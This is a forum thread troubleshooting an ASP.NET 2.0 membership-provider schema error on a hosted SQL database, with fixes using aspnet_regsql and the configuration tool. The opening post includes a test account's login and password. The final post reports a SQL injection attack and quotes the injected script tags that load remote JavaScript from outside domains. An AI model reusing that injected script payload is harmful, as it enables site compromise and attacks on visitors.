Help me please

Discussion in 'ASP.NET 2.0' started by easyrealtya, May 12, 2005.

1. Dear Bruce,Dan or any of you gurus,
    Please support guys help get me past this one. I have gotten pretty far on my own but this one has me stuck
    Go to http://beta-146070.server1.dotnetsandbox.net/login.aspx?ReturnUrl=%2fDefault.aspx
    And login as userid=q and password=Qazqaz1!
    You get his error that follows.
    I made thedatabase with the utility in my windows\microfsoft.net\framework \v2.0.50215
    I copied all the structures to the database you provide on the addon site.
    I set my configurationconnection string to use that database as the default provider.
    My Web.config is after the error message below.
    How did I get the incorrect provider or schema. Can you help me past this one PLEASE
    I can run this shabang fine here on my PC but on the beta site I go Kaboom ;)
    Server Error in '/' Application.

The 'System.Web.Security.SqlMembershipProvider' requires a database schema compatible with schema version '1'. However, the current database schema is not compatible with this version. You may need to either install a compatible schema with aspnet_reqsql.exe (available in the framework installation directory), or upgrade the provider to a newer version.
    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Configuration.Provider.ProviderException: The 'System.Web.Security.SqlMembershipProvider' requires a database schema compatible with schema version '1'. However, the current database schema is not compatible with this version. You may need to either install a compatible schema with aspnet_reqsql.exe (available in the framework installation directory), or upgrade the provider to a newer version.

WEB.CONFIG......

<configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">

<connectionStrings>

<add name="DB_146070ConnectionString" connectionString="Data Source=mssql05.discountasp.net;Initial Catalog=DB_146070;User ID=easyrealtya;Password=????????" providerName="System.Data.SqlClient"/>

<add name="DB_146070ConnectionString2" connectionString="Data Source=YOUR-VP7X3S9CTM;Initial Catalog=DB_146070;User ID=easyrealtya;Password=????????" providerName="System.Data.SqlClient"/>

</connectionStrings>

<system.web>

<customErrors defaultRedirect="~/Login.aspx" mode="Off" />

<authentication mode="Forms" />

<membership defaultProvider="DB_146070ConnectionString" >

<providers>

<add name="DB_146070ConnectionString" type="System.Web.Security.SqlMembershipProvider" connectionStringName="DB_146070ConnectionString" applicationName="MyApplication" enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="true" requiresUniqueEmail="true" passwordFormat="Hashed"/>

</providers>

</membership>

</system.web>

</configuration>

Whare am I f'n up??????????????????

2. I would love to be able to just point at the addon sql server and create the database but we do not have rights to create a new database on that server.

3. This sounds like a problemcaused by an incomplete database schema (the database thatact as your membership provider),you might have missed something in the database during the upload process. I suggest cleaning out the content in your SQL database anduse the aspnet_regsql.exe tool (you can find that in c:\windows\Microsoft.net\Framework\v2.0.50215\) to generate a SQL script to populatea freshdatabase schema. That way you can ensure that everything got created properly.

4. I did forget the view when I exported data tot he addon sql db. I pushed them over and all is working great now. Thanks!!!!!!![​IMG]

5. You do not need to create a database, exportthe SQL script (using aspnet_regsql.exe)withthedatabase name for your SQL 2000 account and login. The script will then create all the tables, stored procedure and views in the database specified. The syntax should look something like:

aspnet_regsql -S mssql07.discountasp.net -U [your SQL login] -P [your SQL password] -sqlexportonly c:\name.sql -A all -d [your database name]

6. followed this and when I tried to create the data using the command line I got "The export file specified already exists"

Now what?

7. I just had this same problem. Ran the aspnet_regsql utility against the database but was getting the "requires a database schema compatible with schema version '1'" error.

Tried everything from completing removing all aspnet_regsql components and then installing them back again to just creating the script and doing it by hand. [​IMG]

The thing that actually did the trick was going through the ASP.NET Configuration utility (Visual Studio - under Website menu), taking the application offline and then back online. This actually just makes a change to web.config (not exactly sure what the change was). So after taking it offline, I had to upload web.config to the hosted solution. Then took the application back online, recopied web.config, etc.

[​IMG] it worked!

I know this won't help out easyrealtyva, but it might help out the next developer like me who's searching through old forum posts 6 months down the road.

8. Just wanted to say I was having the same problem with the 'SqlPersonalizationProvider requires a database schema compatible with schema version '1'' error, and your suggestion of taking the app offline through the Configuration utility did the trick! Thank you very much.

9. Wonderful that really helped ! Thank you all .

Thanks easyrealtya !

Many Regards,
    -Sunny.

10. gb

gb

I suddenly started receiving this error because I was the victim of a SQL injection attack. Check your aspnet_SchemaVersions table. I found the following code appended to the data in each row of the table: <script src=http://www.bios47.com/b.js></script><script src=http://www.ucomddv.com/ngg.js></script>.